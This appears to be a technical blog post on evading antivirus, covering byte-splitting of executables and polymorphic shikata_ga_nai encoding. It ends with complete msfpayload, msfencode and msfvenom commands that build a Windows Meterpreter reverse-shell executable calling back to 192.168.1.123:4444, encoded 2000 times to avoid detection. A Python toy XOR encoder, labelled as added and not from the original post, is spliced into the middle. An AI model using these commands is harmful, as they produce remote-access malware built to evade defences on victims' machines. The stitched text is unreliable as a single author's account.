This is going to be a very technical post. I’m going to leave a few parts out and force you to search around a bit if you want to actually accomplish the title. The purpose being, that I don’t want to have copy-and-pasteable text for anyone with Kali Linux to bypass AV.
First, the theory. Antivirus works on signatures. So, change the signaturized portion of the code and evade AV. There are a few ways you can do this. Either way, if you have a specific executable you want to run, you’ll have to modify it. One way is to split up the executable until you find the bytes that are being alerted on. A second way we’ll discuss is to use encoding.
The first way is to use a program like dsplit to split up your program into several pieces. From there, on a test machine you’d continue to split it up and scan it with the AV you’re intending on bypassing until you find the byte it alerts on. Change the byte and reassemble the executable. In the end, your new executable should work and not set off any alarms. One issue with this is that you may actually lose some functionality in the byte(s) you change. That’s not good.
The second way is to utilize an encoding method. In our example, we’ll use Shikata Ga Nai. Defined by Rapid7 as, “This encoder implements a polymorphic XOR additive feedback encoder. The decoder stub is generated based on dynamic instruction substitution and dynamic block ordering. Registers are also selected dynamically.” Essentially, you’re going to make your program look entirely different to AV without changing any functionality. This encoder will also change things differently every time, even when the same command is executed (redefining insanity).
If you take Metasploit’s bread and butter, meterpreter, and put it into virustotal.com you’ll see that just about every AV lights up. Woot! WIN FOR AV!
Now if we take meterpreter and run it through the shikata_ga_nai encoder several times you’ll start noticing more green check marks identifying the program as good-to-go on virustotal.com. Do it enough and you’ll get a lot of them checked off. There’s a very simple next step you can take that will actually bypass all of them and run flawlessly. However, that’s my secret that I’m going to keep… probably.
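To make the theory concrete, here is an added illustration that is not from the original post and not Metasploit’s encoder: a toy XOR additive feedback pass over a constructed text string (PAYLOAD, SIGNATURE and the keys are all assumptions). It shows why a naive substring signature on the body stops matching after a single pass, why fresh keys make every run look different, and why the unchanged decode loop is the piece a defender’s signature still has to hook.

```python
import secrets

MASK = 0xFFFFFFFF
# Constructed sample "body" and the byte signature an AV might key on.
# Plain text, not executable code, so only the mechanics are shown.
PAYLOAD = b"CONSTRUCTED SAMPLE BODY 0123456789 -- not real shellcode --"
SIGNATURE = b"SAMPLE BODY 0123"

def _words(data: bytes) -> list[int]:
    """Split into 4-byte little-endian words, zero-padding the tail."""
    data += b"\x00" * ((-len(data)) % 4)
    return [int.from_bytes(data[i:i + 4], "little") for i in range(0, len(data), 4)]

def encode(data: bytes, key: int) -> bytes:
    """One XOR additive-feedback pass: c = w ^ key; key = key + c (mod 2**32)."""
    out = bytearray()
    for w in _words(data):
        c = w ^ key
        key = (key + c) & MASK          # feedback: next key depends on the output
        out += c.to_bytes(4, "little")
    return bytes(out)

def decode(blob: bytes, key: int) -> bytes:
    """Inverse pass; this loop is what a decoder stub does at run time."""
    out = bytearray()
    for c in _words(blob):
        out += (c ^ key).to_bytes(4, "little")
        key = (key + c) & MASK
    return bytes(out)

def encode_iterated(data: bytes, keys: list[int]) -> bytes:
    """One pass per key, the way -c N / -i N stack passes."""
    for k in keys:
        data = encode(data, k)
    return data

def decode_iterated(blob: bytes, keys: list[int]) -> bytes:
    for k in reversed(keys):
        blob = decode(blob, k)
    return blob

def signature_matches(blob: bytes, signature: bytes = SIGNATURE) -> bool:
    """A naive static signature check: exact byte substring."""
    return signature in blob

def random_keys(n: int) -> list[int]:
    """Fresh keys each run, which is why every encoding looks different."""
    return [secrets.randbits(32) for _ in range(n)]
```

Run `encode_iterated(PAYLOAD, random_keys(2))` a few times and compare the outputs: the body differs every time and never contains SIGNATURE, yet `decode_iterated` with the same keys restores it.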
So, here are the commands:
Unencoded version —
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=4444 X > meterpreter.exe
MSFPayload/MSFEncode version (note: both tools have since been removed from Metasploit in favor of msfvenom) —
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 2000 -t exe -o /root/Desktop/encoded_meterpreter.exe
MSFVenom version —
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=4444 -e x86/shikata_ga_nai -i 2000 -f exe > encoded_meterpreter.exe